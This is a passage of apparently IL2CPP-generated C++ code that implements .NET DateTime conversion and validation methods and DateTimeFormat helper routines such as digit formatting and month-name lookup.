L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteralE4C3A2D0CC24A4535EF91791064FFE989CBD382A); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteralE4C3A2D0CC24A4535EF91791064FFE989CBD382A); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3_RuntimeMethod_var); } } extern "C" Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3(_thisAdjusted, ___provider0, method); } // System.DateTime System.DateTime::System.IConvertible.ToDateTime(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_System_IConvertible_ToDateTime_m2E02F7ED2921DB5A3D7AC8381A6B496F9EC0C7A3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { { return (*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this); } } extern "C" DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_System_IConvertible_ToDateTime_m2E02F7ED2921DB5A3D7AC8381A6B496F9EC0C7A3_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToDateTime_m2E02F7ED2921DB5A3D7AC8381A6B496F9EC0C7A3(_thisAdjusted, ___provider0, method); } // System.Object System.DateTime::System.IConvertible.ToType(System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, Type_t * ___type0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_0 = (*(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this); RuntimeObject * L_1 = Box(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var, &L_0); Type_t * L_2 = ___type0; RuntimeObject* L_3 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeObject * L_4 = Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3((RuntimeObject*)L_1, L_2, L_3, /*hidden argument*/NULL); return L_4; } } extern "C" RuntimeObject * DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5_AdjustorThunk (RuntimeObject * __this, Type_t * ___type0, RuntimeObject* ___provider1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5(_thisAdjusted, ___type0, ___provider1, method); } // System.Boolean System.DateTime::TryCreate(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.DateTime&) extern "C" IL2CPP_METHOD_ATTR bool DateTime_TryCreate_m66B150DF90CE2A1C9658A034DE7964EE44F5D58A (int32_t ___year0, int32_t ___month1, int32_t ___day2, int32_t ___hour3, int32_t ___minute4, int32_t ___second5, int32_t ___millisecond6, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * ___result7, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_TryCreate_m66B150DF90CE2A1C9658A034DE7964EE44F5D58A_MetadataUsageId); s_Il2CppMethodInitialized = true; } Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* V_0 = NULL; int64_t V_1 = 0; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* G_B8_0 = NULL; { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_0 = ___result7; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_MinValue_31(); *(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_0 = L_1; int32_t L_2 = ___year0; if ((((int32_t)L_2) < ((int32_t)1))) { goto IL_0021; } } { int32_t L_3 = ___year0; if ((((int32_t)L_3) > ((int32_t)((int32_t)9999)))) { goto IL_0021; } } { int32_t L_4 = ___month1; if ((((int32_t)L_4) < ((int32_t)1))) { goto IL_0021; } } { int32_t L_5 = ___month1; if ((((int32_t)L_5) <= ((int32_t)((int32_t)12)))) { goto IL_0023; } } IL_0021: { return (bool)0; } IL_0023: { int32_t L_6 = ___year0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); bool L_7 = DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7(L_6, /*hidden argument*/NULL); if (L_7) { goto IL_0032; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_8 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth365_29(); G_B8_0 = L_8; goto IL_0037; } IL_0032: { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_9 = ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->get_DaysToMonth366_30(); G_B8_0 = L_9; } IL_0037: { V_0 = G_B8_0; int32_t L_10 = ___day2; if ((((int32_t)L_10) < ((int32_t)1))) { goto IL_0048; } } { int32_t L_11 = ___day2; Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_12 = V_0; int32_t L_13 = ___month1; int32_t L_14 = L_13; int32_t L_15 = (L_12)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_14)); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_16 = V_0; int32_t L_17 = ___month1; int32_t L_18 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_17, (int32_t)1)); int32_t L_19 = (L_16)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_18)); if ((((int32_t)L_11) <= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_15, (int32_t)L_19))))) { goto IL_004a; } } IL_0048: { return (bool)0; } IL_004a: { int32_t L_20 = ___hour3; if ((((int32_t)L_20) < ((int32_t)0))) { goto IL_0069; } } { int32_t L_21 = ___hour3; if ((((int32_t)L_21) >= ((int32_t)((int32_t)24)))) { goto IL_0069; } } { int32_t L_22 = ___minute4; if ((((int32_t)L_22) < ((int32_t)0))) { goto IL_0069; } } { int32_t L_23 = ___minute4; if ((((int32_t)L_23) >= ((int32_t)((int32_t)60)))) { goto IL_0069; } } { int32_t L_24 = ___second5; if ((((int32_t)L_24) < ((int32_t)0))) { goto IL_0069; } } { int32_t L_25 = ___second5; if ((((int32_t)L_25) < ((int32_t)((int32_t)60)))) { goto IL_006b; } } IL_0069: { return (bool)0; } IL_006b: { int32_t L_26 = ___millisecond6; if ((((int32_t)L_26) < ((int32_t)0))) { goto IL_0079; } } { int32_t L_27 = ___millisecond6; if ((((int32_t)L_27) < ((int32_t)((int32_t)1000)))) { goto IL_007b; } } IL_0079: { return (bool)0; } IL_007b: { int32_t L_28 = ___year0; int32_t L_29 = ___month1; int32_t L_30 = ___day2; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int64_t L_31 = DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64(L_28, L_29, L_30, /*hidden argument*/NULL); int32_t L_32 = ___hour3; int32_t L_33 = ___minute4; int32_t L_34 = ___second5; int64_t L_35 = DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB(L_32, L_33, L_34, /*hidden argument*/NULL); V_1 = ((int64_t)il2cpp_codegen_add((int64_t)L_31, (int64_t)L_35)); int64_t L_36 = V_1; int32_t L_37 = ___millisecond6; V_1 = ((int64_t)il2cpp_codegen_add((int64_t)L_36, (int64_t)((int64_t)il2cpp_codegen_multiply((int64_t)(((int64_t)((int64_t)L_37))), (int64_t)(((int64_t)((int64_t)((int32_t)10000)))))))); int64_t L_38 = V_1; if ((((int64_t)L_38) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00ad; } } { int64_t L_39 = V_1; if ((((int64_t)L_39) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_00af; } } IL_00ad: { return (bool)0; } IL_00af: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_40 = ___result7; int64_t L_41 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_42; memset(&L_42, 0, sizeof(L_42)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_42), L_41, 0, /*hidden argument*/NULL); *(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_40 = L_42; return (bool)1; } } // System.Void System.DateTime::.cctor() extern "C" IL2CPP_METHOD_ATTR void DateTime__cctor_mE95C20EB1DD6B449472701E37D593FBF224E3D58 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__cctor_mE95C20EB1DD6B449472701E37D593FBF224E3D58_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_0 = (Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83*)SZArrayNew(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83_il2cpp_TypeInfo_var, (uint32_t)((int32_t)13)); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_1 = L_0; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_2 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____E92B39D8233061927D9ACDE54665E68E7535635A_121_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_1, L_2, /*hidden argument*/NULL); ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->set_DaysToMonth365_29(L_1); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_3 = (Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83*)SZArrayNew(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83_il2cpp_TypeInfo_var, (uint32_t)((int32_t)13)); Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* L_4 = L_3; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_5 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____DD3AEFEADB1CD615F3017763F1568179FEE640B0_117_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_4, L_5, /*hidden argument*/NULL); ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->set_DaysToMonth366_30(L_4); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_6; memset(&L_6, 0, sizeof(L_6)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_6), (((int64_t)((int64_t)0))), 0, /*hidden argument*/NULL); ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->set_MinValue_31(L_6); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_7; memset(&L_7, 0, sizeof(L_7)); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F((&L_7), ((int64_t)3155378975999999999LL), 0, /*hidden argument*/NULL); ((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_StaticFields*)il2cpp_codegen_static_fields_for(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var))->set_MaxValue_32(L_7); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.DateTimeFormat::FormatDigits(System.Text.StringBuilder,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53 (StringBuilder_t * ___outputBuffer0, int32_t ___value1, int32_t ___len2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53_MetadataUsageId); s_Il2CppMethodInitialized = true; } { StringBuilder_t * L_0 = ___outputBuffer0; int32_t L_1 = ___value1; int32_t L_2 = ___len2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m42EA03EA97A7BF81D98A8DA1DC2449DF7A74F05A(L_0, L_1, L_2, (bool)0, /*hidden argument*/NULL); return; } } // System.Void System.DateTimeFormat::FormatDigits(System.Text.StringBuilder,System.Int32,System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatDigits_m42EA03EA97A7BF81D98A8DA1DC2449DF7A74F05A (StringBuilder_t * ___outputBuffer0, int32_t ___value1, int32_t ___len2, bool ___overrideLengthLimit3, const RuntimeMethod* method) { Il2CppChar* V_0 = NULL; Il2CppChar* V_1 = NULL; int32_t V_2 = 0; int32_t V_3 = 0; { bool L_0 = ___overrideLengthLimit3; if (L_0) { goto IL_000a; } } { int32_t L_1 = ___len2; if ((((int32_t)L_1) <= ((int32_t)2))) { goto IL_000a; } } { ___len2 = 2; } IL_000a: { int8_t* L_2 = (int8_t*) alloca((((uintptr_t)((int32_t)32)))); memset(L_2,0,(((uintptr_t)((int32_t)32)))); V_0 = (Il2CppChar*)(L_2); Il2CppChar* L_3 = V_0; V_1 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_3, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)16))), (int32_t)2)))); int32_t L_4 = ___value1; V_2 = L_4; } IL_001a: { Il2CppChar* L_5 = V_1; Il2CppChar* L_6 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_subtract((intptr_t)L_5, (int32_t)2)); V_1 = (Il2CppChar*)L_6; int32_t L_7 = V_2; *((int16_t*)L_6) = (int16_t)(((int32_t)((uint16_t)((int32_t)il2cpp_codegen_add((int32_t)((int32_t)((int32_t)L_7%(int32_t)((int32_t)10))), (int32_t)((int32_t)48)))))); int32_t L_8 = V_2; V_2 = ((int32_t)((int32_t)L_8/(int32_t)((int32_t)10))); int32_t L_9 = V_2; if (!L_9) { goto IL_0034; } } { Il2CppChar* L_10 = V_1; Il2CppChar* L_11 = V_0; if ((!(((uintptr_t)L_10) <= ((uintptr_t)L_11)))) { goto IL_001a; } } IL_0034: { Il2CppChar* L_12 = V_0; Il2CppChar* L_13 = V_1; V_3 = (((int32_t)((int32_t)(((int64_t)((int64_t)(intptr_t)((Il2CppChar*)((intptr_t)((Il2CppChar*)il2cpp_codegen_subtract((intptr_t)((Il2CppChar*)il2cpp_codegen_add((intptr_t)L_12, (intptr_t)((intptr_t)il2cpp_codegen_multiply((intptr_t)(((intptr_t)((int32_t)16))), (int32_t)2)))), (intptr_t)L_13))/(int32_t)2)))))))); goto IL_0050; } IL_0044: { Il2CppChar* L_14 = V_1; Il2CppChar* L_15 = (Il2CppChar*)((Il2CppChar*)il2cpp_codegen_subtract((intptr_t)L_14, (int32_t)2)); V_1 = (Il2CppChar*)L_15; *((int16_t*)L_15) = (int16_t)((int32_t)48); int32_t L_16 = V_3; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_16, (int32_t)1)); } IL_0050: { int32_t L_17 = V_3; int32_t L_18 = ___len2; if ((((int32_t)L_17) >= ((int32_t)L_18))) { goto IL_0058; } } { Il2CppChar* L_19 = V_1; Il2CppChar* L_20 = V_0; if ((!(((uintptr_t)L_19) <= ((uintptr_t)L_20)))) { goto IL_0044; } } IL_0058: { StringBuilder_t * L_21 = ___outputBuffer0; Il2CppChar* L_22 = V_1; int32_t L_23 = V_3; StringBuilder_Append_m353B571BF530B0BD74B61E499EAF6536F1B93E84(L_21, (Il2CppChar*)(Il2CppChar*)L_22, L_23, /*hidden argument*/NULL); return; } } // System.Void System.DateTimeFormat::HebrewFormatDigits(System.Text.StringBuilder,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC (StringBuilder_t * ___outputBuffer0, int32_t ___digits1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { StringBuilder_t * L_0 = ___outputBuffer0; int32_t L_1 = ___digits1; IL2CPP_RUNTIME_CLASS_INIT(HebrewNumber_tD97296A15B8A299C729AF74ECE07226395D0655E_il2cpp_TypeInfo_var); String_t* L_2 = HebrewNumber_ToString_mCFDFB829050DAA0081F94AE7BA9176124852557F(L_1, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_0, L_2, /*hidden argument*/NULL); return; } } // System.Int32 System.DateTimeFormat::ParseRepeatPattern(System.String,System.Int32,System.Char) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB (String_t* ___format0, int32_t ___pos1, Il2CppChar ___patternChar2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; { String_t* L_0 = ___format0; int32_t L_1 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_0, /*hidden argument*/NULL); V_0 = L_1; int32_t L_2 = ___pos1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_2, (int32_t)1)); goto IL_0011; } IL_000d: { int32_t L_3 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_3, (int32_t)1)); } IL_0011: { int32_t L_4 = V_1; int32_t L_5 = V_0; if ((((int32_t)L_4) >= ((int32_t)L_5))) { goto IL_001f; } } { String_t* L_6 = ___format0; int32_t L_7 = V_1; Il2CppChar L_8 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_6, L_7, /*hidden argument*/NULL); Il2CppChar L_9 = ___patternChar2; if ((((int32_t)L_8) == ((int32_t)L_9))) { goto IL_000d; } } IL_001f: { int32_t L_10 = V_1; int32_t L_11 = ___pos1; return ((int32_t)il2cpp_codegen_subtract((int32_t)L_10, (int32_t)L_11)); } } // System.String System.DateTimeFormat::FormatDayOfWeek(System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatDayOfWeek_m3F0892B000EBE522857AD1EE8676FEBBED8A21F9 (int32_t ___dayOfWeek0, int32_t ___repeat1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { { int32_t L_0 = ___repeat1; if ((!(((uint32_t)L_0) == ((uint32_t)3)))) { goto IL_000c; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_1 = ___dtfi2; int32_t L_2 = ___dayOfWeek0; String_t* L_3 = DateTimeFormatInfo_GetAbbreviatedDayName_m31D50EB7EF2ED3E7F0F72C14498427D8E7799D43(L_1, L_2, /*hidden argument*/NULL); return L_3; } IL_000c: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi2; int32_t L_5 = ___dayOfWeek0; String_t* L_6 = DateTimeFormatInfo_GetDayName_m82CF60408D75B103DAFF96575B257EFFA80569AF(L_4, L_5, /*hidden argument*/NULL); return L_6; } } // System.String System.DateTimeFormat::FormatMonth(System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatMonth_mA46FA8711C67F699CA3571582725FA8CB226757F (int32_t ___month0, int32_t ___repeatCount1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { { int32_t L_0 = ___repeatCount1; if ((!(((uint32_t)L_0) == ((uint32_t)3)))) { goto IL_000c; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_1 = ___dtfi2; int32_t L_2 = ___month0; String_t* L_3 = DateTimeFormatInfo_GetAbbreviatedMonthName_m5C71C0AB3BCCD6AE4C17104BCB4D2F65759E9D06(L_1, L_2, /*hidden argument*/NULL); return L_3; } IL_000c: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_4 = ___dtfi2; int32_t L_5 = ___month0; String_t* L_6 = DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC(L_4, L_5, /*hidden argument*/NULL); return L_6; } } // System.String System.DateTimeFormat::FormatHebrewMonthName(System.DateTime,System.Int32,System.Int32,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_FormatHebrewMonthName_m95BC9040E14EDDE6DF41A71A93F9D7D1878661E6 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___time0, int32_t ___month1, int32_t ___repeatCount2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method) { { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_0 = ___dtfi3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_1 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_0, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_3 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_2, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_4 = ___time0; int32_t L_5 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(18 /* System.Int32 System.Globalization.Calendar::GetYear(System.DateTime) */, L_3, L_4); bool L_6 = VirtFuncInvoker1< bool, int32_t >::Invoke(19 /* System.Boolean System.Globalization.Calendar::IsLeapYear(System.Int32) */, L_1, L_5); if (!L_6) { goto IL_0026; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_7 = ___dtfi3; int32_t L_8 = ___month1; int32_t L_9 = ___repeatCount2; String_t* L_10 = DateTimeFormatInfo_internalGetMonthName_mE9361985B13F655CED883CDDF45DC962EE2F1F77(L_7, L_8, 2, (bool)((((int32_t)L_9) == ((int32_t)3))? 1 : 0), /*hidden argument*/NULL); return L_10; } IL_0026: { int32_t L_11 = ___month1; if ((((int32_t)L_11) < ((int32_t)7))) { goto IL_002f; } } { int32_t L_12 = ___month1; ___month1 = ((int32_t)il2cpp_codegen_add((int32_t)L_12, (int32_t)1)); } IL_002f: { int32_t L_13 = ___repeatCount2; if ((!(((uint32_t)L_13) == ((uint32_t)3)))) { goto IL_003b; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_14 = ___dtfi3; int32_t L_15 = ___month1; String_t* L_16 = DateTimeFormatInfo_GetAbbreviatedMonthName_m5C71C0AB3BCCD6AE4C17104BCB4D2F65759E9D06(L_14, L_15, /*hidden argument*/NULL); return L_16; } IL_003b: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_17 = ___dtfi3; int32_t L_18 = ___month1; String_t* L_19 = DateTimeFormatInfo_GetMonthName_m442F6260E03F4C61CE83A7DE211B62EB88678DDC(L_17, L_18, /*hidden argument*/NULL); return L_19; } } // System.Int32 System.DateTimeFormat::ParseQuoteString(System.String,System.Int32,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60 (String_t* ___format0, int32_t ___pos1, StringBuilder_t * ___result2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; Il2CppChar V_2 = 0x0; bool V_3 = false; Il2CppChar V_4 = 0x0; { String_t* L_0 = ___format0; int32_t L_1 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_0, /*hidden argument*/NULL); V_0 = L_1; int32_t L_2 = ___pos1; V_1 = L_2; String_t* L_3 = ___format0; int32_t L_4 = ___pos1; int32_t L_5 = L_4; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_5, (int32_t)1)); Il2CppChar L_6 = 